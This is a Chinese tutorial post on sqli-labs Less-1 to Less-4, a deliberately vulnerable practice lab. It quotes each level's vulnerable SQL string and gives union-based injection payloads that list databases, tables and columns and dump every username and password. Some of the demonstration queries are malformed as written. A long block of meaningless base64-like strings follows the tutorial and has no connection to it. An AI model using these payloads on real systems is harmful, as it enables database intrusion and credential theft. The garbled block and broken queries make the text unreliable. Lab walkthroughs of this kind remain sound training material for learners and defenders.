sqli-labs1-4

首先我们通过文本编辑器中打开文件夹中的“index.php"

在这里面我们可以看到相应题目里面的sql语句:

如上图中的 “        $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";        ”即为less-1的sql语句,大意便是“在users表的id列中寻找 $id”,

当我们在网址后输入“?id=1”时, $sql中就会将我们输入的"id= "后面的部分代入至$id中去。

而当我们在地址中输入id=1'--+时,网页并不会报错,所以我们可以在“--+”前输入一些我们自己的代码来得到我们想要的数据或结果。

所以第一题我们可以使用“?id=1' and 1=1 --+”来完成。

 Less-2中sql语句:$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

 Less-3中sql语句:$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

 Less-4中sql语句:$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

可见前四题的类型大体是差不多的,仅仅只是结构方面有些区别,因此只需进行一些简单的变换便能得到各题的结果。

而假如我们想要得到这个数据库里的一些其他的信息,那么我们就需要一些别的方法和工具来得到我们想要的结果。在后文,笔者将使用小皮(phpstudy)中提供的SQL_Front5.3进行演示。

在localhost-security-users中打开SQL编辑器:

 使用        select * from users        显示users表中的所以内容。

在此我们可以使用        select * from users union select 1,2,3         在表上新建出一列

select * from users id=1000' union select 1,database(),version() --+         在第二三列显示数据库的名称和mysql的版本。

select * from users id=1000' union select 1,group_concat(schema_name) ,3 from information_schema.schemata --+        显示服务器中有那些数据库。

select * from users id=1000' union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema='security' --+        显示当前库中有那些表,其中有users表。

select * from users id=1000' union select 1,group_concat(column_name) ,3 from information_schema.columns where   table_name='users' and table_schema='security'  --+
        显示当前库的users表中有那些字段,其中有username,password字段。

select * from users id=1000' union select 1,group_concat(concat_ws(':',username,password)) ,3 from users --+        显示users表中所有用户和密码。

bhaaAThangemMkaz2tQhq3/f7dZ7 Vj29WeGHjuupj/AhYqymjAuokhYi X1T/fG+q1yR22PdcEP39dxU3ovEo lLLzwIZlQr9oJYwUf5eG4x5e1bMP nfIaIl8reszQPHFNbrxBjCVrBEXL TyBLehxzUpVI672t3LjX8q4ytCRC ezcoZQfMAc0DulJzNREbwlcf0Rco N0zW3ojBUxGsplBBZZPrD7/bPhkM rjtS8Bxym+HeV1TJDTXuiL8QLg== ====================================== fSbC9xxy7ga57DOrLz9mMqYSFx8S OIWiOBI61uJ562GINVTVNBDaGBIl Cuni0a1iUAF88I6zrHzH9Wzcv4h+ h3wTGgOX8mYgN0jEEOmzI1DLx0DJ 8t94hUJ5O0I99Ts6iqvHhw24jYfI h++JG/BzVLnaSDbNdqH9iYbXZ2Pc eFZAZe6hzPQ9DREtkEvg7rAul/Fw ZptCP1WFfKkfgviwY8i67NucJe2L UTZFKoX5MGSuP9GGJnouQg/P1SII 3PCKXGoUv0hBoTiMLXBlJWpaNg== ============================================= 0W01VaFQPp/XRYgXjOFSUY7hZ5Cc W9f35KH4bym2jmhYygsHyNsr47Hs 7OBjd7QH+ALAKqZdDAh/AfG3V/8Q his64uZEhglY8B8yu5PvN49tOO05 XG7Qyz3skOK3An9Zoc/xSA1fLGeq PioqBj/khHWF1LK0lBi00LOLFXzs oQtoMi1Ol+Ehxz8URH3kQqN09raw iM7DrTxZe1oVoOjTPDerwPOLULI1 6EnbdBu92YSk0tYQw0BmVss2G6ak GjaDrPWrDWP3uip0OOX4UXNggQ== =============================================== H4nLHG3xsjy5l4QMEsSpaYAyggPp 9OdFDMG0Y1XM7VqTyg+GAAm8V/eP 9zuAwQ5/9tA8GQeOlavXxIDkMsY7 I4UAy4LmhUU2vLtEkgjtMhSd3nFT OGe2bOmGvoMCPts/1eQx5YFMet9K AjkZPI1BR8/fm7Mb0bQOPeJQyilC T1/4k4MfqnQkub06+ADZ7pg3WdkC jneqAVvKPaM2Kf55cGDsLmo3Xxck ZHpzPKJDISjEQ+qFadS8Z9Ao0HHK 31JWyvw0Qr/9d0Ku10+W6DrhZw== ================================================= DZaNXFw2rfRrF3xlukPGGiilkurQ r7vKuSPCUEdAoRWRJmjnADY0Ink3 Nr9qD3CM5+v9PYJ4uf/b9jShtlYH KV16XPA+On7CjH8zqxywbz2ci85i f0va/I0DOvGhpsww1jAJCJWC4A+z ZjTMzA0+SEQcKyHzOUe89eA+c/Gq FZBmitn5u602wlMj2KtvMSN8EgSc wDVxI+FSi0U/b89fRaUMJRbUadm0 uZHKMPdlaykMQPwZFN8G561OFCU/ rbFQlatd0JFPnLKxjNsjva04LQ== =============================================== hFeWdc8oboH/QwzaaLhrH6CgRo6g nBXqa0bjHJdEYTIzMdqnkEBvygf+ xJeO2zRqajhnH+S1wZWeNUwXLwZm KvS8LCvwCf1WBqzsRMuDOTQnac5d RGf80G986szBG8kzkhKjC4Bx3uLy NomiYSHrGBoDacd5wPCqFMoTsaMC CjVMabK/JyQyAeuULOf8lW0WiXTo TKH7k1yGW6plaQKWGIqBZuYlYk5H tFm8hdKXaxbeiiREFl7ni1G9lP7j 1Gdf/cmb+fq2sKrSgZyLEjQLFA== =============================================== Y2CjWsyI23Fa0G1pban8ep83zQAI 7mERztK7a3ZufX0LWeAe/y50DURN kOOlakZ0dgkoipf/6KsNEEm2aptm L3/dXG1jKphojzSwNsS4PHY4qGKA 9vHBEAsDLlwGrLFfmdtKOCrgNG6V ab7clt+yRFuxctwefegNu02YdlGC wEKI2MP9QcMXl/aFLkFsz3mBFn1t YZtjYFswD+7zJ6KETy1cRK0TG/UK /6GoBQtjLIeCjNBbrEWvOm6XunsO jCaOhBeccOe3lIUCbJEwSFKAGA== ============================================= 3AFJhTfHVl0MBUFC1NEgO34cyEqR saJhnLE8X1K0OU5wU630QIlLyAiu pMGYcSoTEanqEaBvKiXFfMvqbTM+ X87dmWn6bicol0G9APDw1GKO4A4g Zyc8z47uRSNgqD9moJGFIdZZ+l1b +/PCg5MKBBhDhc6VDBKJ3hdVTu6L sW3+fY+9awZvyMMrXNu3STU0z0TX kHVOuMI+XqKeywPGEClGO/U5vgN7 DbL2xQm0Czm89V3fPnY+03gVOkP2 dvBKP4EqwgCXuxJVDEbC8T0bPQ== ============================================= SoydMqMl+/Gpf41SeCYSamtq3urK wqREsSLloXTdR1DoEd6sFEtxWH+0 w/nC12MfI+TzlhOuvit3bqOzUSrq XTPipT1EA1YfelWllo3inkHWZ8Bd IG4b/GCULr4ufAKEtZnyXVHeUPoo /HCkWPViDUwQUbQqZhcu7baPDnAo fGQlW5++dTXq3yIZTxNs8tpffgEk 5oemtUyJhXaAEas6KQKw/vEFLPho 48B3tuL31SNvluTSp3O3y8qZvSEV h3GE09Cp7E4SWKkv6rB9VG8Vcg== =============================================== Xzlv+2HZXpuIUhAUGVYmjhw6ncp9 b7qlOIwQa4BiPlhJl61ma2fUW1s4 BvNSzx0WgiHGB86X6VZ1ix3bXZop eq4MxQFHKtaLj60Y6jduOX8Id9Is oBIKLLkuRijSbZJpBxIqHLrz+2C/ nym1n8XbWYagYJ1z4OqNxjkrCGfW LoSPC9jAtivGSk3T5lDsUzh6MEqF bSd6Bjce5tqDgX9AV0DM3icFg3dF /u9XXp+72DOCT9FStV01UwID6L/O zzokhH37OQL8irSbjE1FdGW+TQ== ========================================== BJNZHBPeVX4GKH3AbulBcezga945 qNEKaHM8PpixioQLO0rZ57tUUQ7l jkWF/5Vh6pWVSJTmNhM54CkFDq3a M6EVzfPJT00+YS66mmQe4FI85zaj cvyNyiaKqBh8XjwxXhFs6oHjYJJ4 MAWRTTvOVXDH29E7J30UQkz4qFWD 0445Aj0clJCfu4WAmGq7TmAWF8H2 g+k5VUTx8aBnRS/WVMG3iyryv+3h W2S4LjfsnF1Zsaf4D4N9p5Uqr2rI Lvhaj80tbxjTja+MLVhNr4GURQ== ================================================= Lv/+h44wqgNXFicAJPjLZFqwpCoF mnn2JvfPTtQ9kEX51XdLNImcH6Pe bKp1KUMMGaUWSA5/NRMqqmoVaJQm Fh3B9G2jCyVfYeag+EFRCI/ByCpx Jg+yvnE4i9NUS1mKuBXD/QR5uEBk OsiAzv8DgQORN/sbIkjUKX7vwvzG 6QEaDIPaWzKqPV7RIctjkUt4+5Av r5oBre/6Mg1Q1GIhBftZkD1UtPm3 /3oDrT3o+2SlPNwElOcmypfkMHkk jAVK5+vfb8lOPKou3lmzUPZPKw== ============================================== zPH5/yKwB7akS0BMDoMsIRoIA0dN rE5EB8qSLhyCiwp+oZVZOYm7fH/o z7odFfCIGuTPHwUOB7r2u6AT1v0a i0vSNJXevY/dv/EY2hCClIhxTohs GUE0VLLV3vZJ0+AalJPuXfP3v513 PQgPG0jLLMHoYm2gC0eZU4TCQx0B r4JJo5Ne0CH9wGfwiPdkIul0NhHU uQGP78v0FIsTBbQvDuing6q3msxX GQ+GeVUmshiefNvZ8MzB86ug0PaL hgtayc9N3lwGEf23C2S/MZW6bQ== ================================================== pF+PyM1Vz5eTwApjWBBOC8UtZmOV 0xsmgjgvdTLVMXc8pLbhdsDkvMyI sgBv8WZuftr4FdKRxQVXVr+j5MAi ai3I9jJ4msA80i5ITzj+UykFuXeJ M8AB68iTiN80FjoKA1o2aJcjzc1J ffxHJCavDvlFG7KnfbuM9VjLHIbQ 9lkXTIQX20o6qYOPmPpOG7JqeVLe H4XZLbTjzJp81h5YY9dVISCKbf01 1Wl6vlh3L1Q1IFSnIfaQpTZwixHw bJZE8tuy2STl7G17uiqjuvcmdg==
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值